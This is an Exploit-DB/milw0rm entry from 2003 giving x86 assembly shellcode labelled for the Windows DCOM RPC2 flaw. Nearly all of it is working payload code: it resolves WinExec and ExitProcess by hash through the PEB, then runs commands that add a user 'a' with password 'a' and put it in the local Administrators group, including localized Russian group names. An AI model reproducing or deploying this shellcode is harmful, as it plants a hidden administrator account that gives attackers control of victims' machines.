Windows - DCOM RPC2 Universal Shellcode

EDB-ID:

13532

CVE:

N/A


Platform:

Windows_x86

Published:

2003-10-09

; Segment type:	Pure code
;seg000		segment	byte public 'CODE' use32
;		assume cs:seg000
;		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.386
assume cs:seg000
var_29C		= byte ptr -29Ch
var_28C		= byte ptr -28Ch
var_25F		= byte ptr -25Fh
var_254		= dword	ptr -254h
var_250		= dword	ptr -250h
var_24C		= dword	ptr -24Ch

seg000		segment	byte public 'CODE' use32

beginofpackeddata:			; CODE XREF: UnXORFunc+17j
		push	ebp
		mov	ebp, esp
		sub	esp, 80h
		mov	esi, esp
		call	sub_191
		push eax
		mov	eax, fs:18h
		mov	eax, [eax+30h]
		lea	eax, [eax+18h]
		mov	ebx, 190000h
		mov	[eax], ebx
		pop  eax
		mov	[esi], eax
		push	dword ptr [esi]
		push	0E8AFE98h
		call	GetFunctionBYName ;WinExec
		mov	[esi+0Ch], eax
		push	dword ptr [esi]
		push 	73e2d87eh		
		call	GetFunctionBYName ;ExitProcess
		mov	[esi+10h], eax

		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a a '
		push	'resu'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]

		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a û'
		push	'ðîòà'
		push	'ðòñè'
		push	'íèìä'
		push	'À pu'
		push	'orgl'
		push	'acol'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]

		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a ë'
		push	'à®â '
		push	'àâá¨'
		push	'­¨¬¤'
		push	'€ pu'
		push	'orgl'
		push	'acol'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]
				
		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a s'
		push	'rota'
		push	'rtsi'
		push	'nimd'
		push	'A pu'
		push	'orgl'
		push	'acol'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]

		push	0h
		call	dword ptr [esi+10h] ;
;		end

; ››››››››››››››› S U B	R O U T	I N E ›››››››››››››››››››››››››››››››››››››››


GetFunctionBYName proc near		; CODE XREF: UnXORFunc+31p
					; UnXORFunc+40p ...

arg_0		= dword	ptr  14h
arg_4		= dword	ptr  18h

		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, [esp+arg_4]
		mov	eax, [ebp+3Ch]
		mov	edx, [ebp+eax+78h]
		add	edx, ebp
		mov	ecx, [edx+18h]
		mov	ebx, [edx+20h]
		add	ebx, ebp

loc_1B2:				; CODE XREF: GetFunctionBYName+36j
		jecxz	short loc_1E6
		dec	ecx
		mov	esi, [ebx+ecx*4]
		add	esi, ebp
		xor	edi, edi
		cld

loc_1BD:				; CODE XREF: GetFunctionBYName+30j
		xor	eax, eax
		lodsb
		cmp	al, ah
		jz	short loc_1CB
		ror	edi, 0Dh
		add	edi, eax
		jmp	short loc_1BD
; „„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„

loc_1CB:				; CODE XREF: GetFunctionBYName+29j
		cmp	edi, [esp+arg_0]
		jnz	short loc_1B2
		mov	ebx, [edx+24h]
		add	ebx, ebp
		mov	cx, [ebx+ecx*2]
		mov	ebx, [edx+1Ch]
		add	ebx, ebp
		mov	eax, [ebx+ecx*4]
		add	eax, ebp
		jmp	short loc_1E8
; „„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„

loc_1E6:				; CODE XREF: GetFunctionBYName+19j
		xor	eax, eax

loc_1E8:				; CODE XREF: GetFunctionBYName+4Bj
		mov	edx, ebp
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	4
GetFunctionBYName endp

sub_191		proc near		; CODE XREF: sub_76+Bp
		push	ebp
		push	esi
		mov	eax, fs:30h
		test	eax, eax
		js	short loc_1A9
		mov	eax, [eax+0Ch]
		mov	esi, [eax+1Ch]
		lodsd
		mov	ebp, [eax+8]
		jmp	short loc_1B2
; „„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„

loc_1A9:				; CODE XREF: sub_191+Aj
		mov	eax, [eax+34h]
		mov	ebp, [eax+0B8h]

loc_1B2:				; CODE XREF: sub_191+16j
		mov	eax, ebp
		pop	esi
		pop	ebp
		retn	4
sub_191 endp
; „„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„„

seg000		ends

end

; milw0rm.com [2003-10-09]